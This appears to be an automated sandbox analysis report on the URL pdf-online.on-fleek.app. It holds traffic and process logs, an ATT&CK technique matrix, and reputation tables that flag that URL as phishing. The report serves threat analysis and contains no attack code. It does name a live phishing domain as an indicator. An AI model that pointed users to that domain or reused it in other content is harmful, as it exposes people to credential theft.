Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65355
Source: unknownNetwork traffic detected: HTTP traffic on port 65516 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49364 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49376 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65340 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65373
Source: unknownNetwork traffic detected: HTTP traffic on port 65504 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65396 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49447 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49585 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65369
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65467 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49155 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49656 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49226 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65411 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49320 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49492 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 65529 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 49519 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 49279 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65484 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49313 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 49474 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49199 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 65335 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49520 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65403 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 49681 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 49622 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 49292 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49267 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 49187 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49462 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65311 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65517 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49417 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 65496 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49394 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: classification engineClassification label: mal72.phis.win@80/1271@68/31
Source: chromecache_995.2.drInitial sample: tel:+97180036677
Source: chromecache_995.2.drInitial sample: https://www.citydiamondcontracting.com/contact
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\d761f46a-4f25-40c7-96ce-92abc01ab1bc.tmpJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-09-27 02-19-16-373.logJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 --field-trial-handle=2192,i,1005448200650348598,15467487990718780475,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://pdf-online.on-fleek.app/"
Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\downloaded.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1716,i,16758670913067445225,6828871122202533892,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://www.citydiamondcontracting.com/contact"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 --field-trial-handle=1908,i,1316434060209903299,14506947510515019219,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6764 --field-trial-handle=1908,i,1316434060209903299,14506947510515019219,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6700 --field-trial-handle=1908,i,1316434060209903299,14506947510515019219,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 --field-trial-handle=2192,i,1005448200650348598,15467487990718780475,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1716,i,16758670913067445225,6828871122202533892,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 --field-trial-handle=1908,i,1316434060209903299,14506947510515019219,262144 /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6764 --field-trial-handle=1908,i,1316434060209903299,14506947510515019219,262144 /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6700 --field-trial-handle=1908,i,1316434060209903299,14506947510515019219,262144 /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\crash_reporter.cfgJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 995
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 995Jump to dropped file
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Spearphishing Link
Windows Management InstrumentationPath Interception1
Process Injection
11
Masquerading
OS Credential Dumping1
System Information Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomains1
Drive-by Compromise
Scheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1520326 URL: https://pdf-online.on-fleek.app/ Startdate: 27/09/2024 Architecture: WINDOWS Score: 72 43 x1.i.lencr.org 2->43 45 googleads.g.doubleclick.net 2->45 47 2 other IPs or domains 2->47 59 Antivirus detection for URL or domain 2->59 61 Antivirus / Scanner detection for submitted sample 2->61 63 AI detected phishing page 2->63 65 2 other signatures 2->65 8 chrome.exe 14 2->8         started        11 chrome.exe 2->11         started        13 Acrobat.exe 17 73 2->13         started        15 chrome.exe 2->15         started        signatures3 process4 dnsIp5 49 192.168.2.4 unknown unknown 8->49 51 192.168.2.5 unknown unknown 8->51 55 2 other IPs or domains 8->55 17 chrome.exe 8->17         started        53 192.168.2.8 unknown unknown 11->53 20 chrome.exe 11->20         started        22 chrome.exe 11->22         started        24 chrome.exe 6 11->24         started        26 AcroCEF.exe 106 13->26         started        process6 dnsIp7 31 pdf-online.on-fleek.app 104.26.13.141 CLOUDFLARENETUS United States 17->31 33 142.250.184.196 GOOGLEUS United States 17->33 39 4 other IPs or domains 17->39 35 tomsher.com 173.231.208.7 INMOTI-1US United States 20->35 37 citydiamondcontracting.com 173.231.215.118 INMOTI-1US United States 20->37 41 22 other IPs or domains 20->41 28 AcroCEF.exe 2 26->28         started        process8 dnsIp9 57 chrome.cloudflare-dns.com 162.159.61.3 CLOUDFLARENETUS United States 28->57

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://pdf-online.on-fleek.app/100%Avira URL Cloudphishing
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://g.co/dev/maps-no-account0%URL Reputationsafe
https://ampcid.google.com/v1/publisher:getClientId0%URL Reputationsafe
https://swiperjs.com0%URL Reputationsafe
https://support.google.com/recaptcha/#61759710%URL Reputationsafe
https://developers.google.com/maps/documentation/javascript/styling#cloud_tooling0%URL Reputationsafe
https://support.google.com/recaptcha0%URL Reputationsafe
https://support.google.com/fusiontables/answer/9185417).0%URL Reputationsafe
https://developers.google.com/maps/deprecations0%URL Reputationsafe
https://www.citydiamondcontracting.com/uploads/services/5/6b7430e47711776a692abe259b42d33c.jpg0%Avira URL Cloudsafe
http://www.opensource.org/licenses/mit-license.php)0%URL Reputationsafe
https://www.tomsher.com/assets/imgs/logos/17.png0%Avira URL Cloudsafe
https://www.tomsher.com/react-native-hybrid-mobile-application-development0%Avira URL Cloudsafe
https://www.google.com/maps/vt?pb=!1m4!1m3!1i15!2i21415!3i14013!1m4!1m3!1i15!2i21414!3i14014!1m4!1m3!1i15!2i21415!3i14014!2m3!1e0!2sm!3i707457653!2m3!1e2!2sspotlit!5i1!3m12!2sen!3sUS!5e289!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!4e3!12m1!5b1!27m15!299174093m14!14m13!1m8!1m2!1y4494427010317758935!2y5827414787517094799!2s%2Fg%2F11bbth6f7x!4m2!1x251881333!2x552584050!15sgcid%3Ageneral_contractor!2b0!3b0!6b0!8b0&client=google-maps-embed&token=36190%Avira URL Cloudsafe
https://www.tomsher.com/assets/imgs/logos/25.png0%Avira URL Cloudsafe
https://www.citydiamondcontracting.com/uploads/projects/11/dc8d49617e8c915bd5328fa315b82453.webp0%Avira URL Cloudsafe
http://alizahid.github.io/jquery-sliding-menu/0%Avira URL Cloudsafe
https://www.citydiamondcontracting.com/uploads/certifications/3/b28c762ff89177dacd4852c7b909ca34.jpg0%Avira URL Cloudsafe
https://www.tomsher.com/social-media-marketing0%Avira URL Cloudsafe
https://developers.google.com/maps/documentation/javascript/error-messages#unsupported-browsers0%URL Reputationsafe
https://www.tomsher.com/assets/imgs/logo.png0%Avira URL Cloudsafe
http://127.0.0.1:5500/service-details.html0%Avira URL Cloudsafe
https://i.ytimg.com/vi/hOPpxvP2E28/sddefault.jpg?sqp=-oaymwEmCIAFEOAD8quKqQMa8AEB-AH-CYAC0AWKAgwIABABGGUgWyhIMA8=&rs=AOn4CLB1pwsAn0qkJuzQscocunfjgcf4QA0%Avira URL Cloudsafe
https://www.citydiamondcontracting.com/uploads/partners/7/5e07aca7ac8c83df08eeb434753dbfeb.jpg0%Avira URL Cloudsafe
https://cloud.google.com/contact0%URL Reputationsafe
https://developers.google.com/maps/documentation/javascript/libraries0%URL Reputationsafe
https://www.tomsher.com/assets/images/menu/blogger.png0%Avira URL Cloudsafe
https://www.citydiamondcontracting.com/uploads/partners/25/fd44eb6a5f7ee9bdeaaf121d22595ebe.jpg0%Avira URL Cloudsafe
https://youtu.be/0%URL Reputationsafe
https://www.tomsher.com/assets/js/ScrollTrigger.min.js0%Avira URL Cloudsafe
https://www.tomsher.com/assets/js/chroma.min.js0%Avira URL Cloudsafe
https://www.citydiamondcontracting.com/images/logo1.png0%Avira URL Cloudsafe
https://www.citydiamondcontracting.com/uploads/dynamic/19/8c31bd6a7e31516d9af11ddd76cf1f8b.png0%Avira URL Cloudsafe
https://github.com/twbs/bootstrap/graphs/contributors)0%Avira URL Cloudsafe
https://www.tomsher.com/assets/imgs/logow.png0%Avira URL Cloudsafe
https://www.google.com/maps/vt?pb=!1m5!1m4!1i15!2i21412!3i14013!4i256!2m3!1e0!2sm!3i707457593!2m3!1e2!2sspotlit!5i1!3m12!2sen!3sUS!5e289!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!4e0!5m1!1e3!23i47083502!27m15!299174093m14!14m13!1m8!1m2!1y4494427010317758935!2y5827414787517094799!2s%2Fg%2F11bbth6f7x!4m2!1x251881333!2x552584050!15sgcid%3Ageneral_contractor!2b0!3b0!6b0!8b0&client=google-maps-embed&token=820460%Avira URL Cloudsafe
https://tomsher.com/0%Avira URL Cloudsafe
https://www.tomsher.com/travel-portal-development0%Avira URL Cloudsafe
https://www.tomsher.com/portfolio0%Avira URL Cloudsafe
https://www.tomsher.com/assets/imgs/logos/7.png0%Avira URL Cloudsafe
https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d7220.8946438946405!2d55.258405!3d25.188133!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0x50df22dfd0d09b8f!2sCity%20Diamond%20Contracting%20LLC!5e0!3m2!1sen!2sus!4v1663058383351!5m2!1sen!2sus0%Avira URL Cloudsafe
https://assets10.lottiefiles.com/packages/lf20_wd6xyqkx.json0%Avira URL Cloudsafe
https://www.tomsher.com/assets/images/menu/squarespace.png0%Avira URL Cloudsafe
https://www.tomsher.com/assets/images/menu/smm.png0%Avira URL Cloudsafe
https://www.tomsher.com/assets/images/menu/vps.png0%Avira URL Cloudsafe
https://www.youtube.com/generate_204?cpn=0%Avira URL Cloudsafe
https://www.youtube.com/s/player/b0557ce3/player_ias.vflset/en_US/embed.js0%Avira URL Cloudsafe
https://www.tomsher.com/waste-oil-management-system0%Avira URL Cloudsafe
https://pdf-online.on-fleek.app/styles.css100%Avira URL Cloudphishing
https://www.youtube.com/s/player/b0557ce3/player_ias.vflset/en_US/remote.js0%Avira URL Cloudsafe
https://www.tomsher.com/assets/images/menu/api.png0%Avira URL Cloudsafe
https://www.citydiamondcontracting.com/uploads/projects/23/c7a29cc2e7fdcacc9c3f5f4ff3bddd5f.webp0%Avira URL Cloudsafe
https://www.tomsher.com/assets/images/menu/amazon.png0%Avira URL Cloudsafe
https://www.tomsher.com/assets/images/menu/oil-barrel.png0%Avira URL Cloudsafe
https://i.ytimg.com/vi_webp/Jo_coLYPcOQ/sddefault.webp0%Avira URL Cloudsafe
https://www.tomsher.com/student-learning-management-system0%Avira URL Cloudsafe
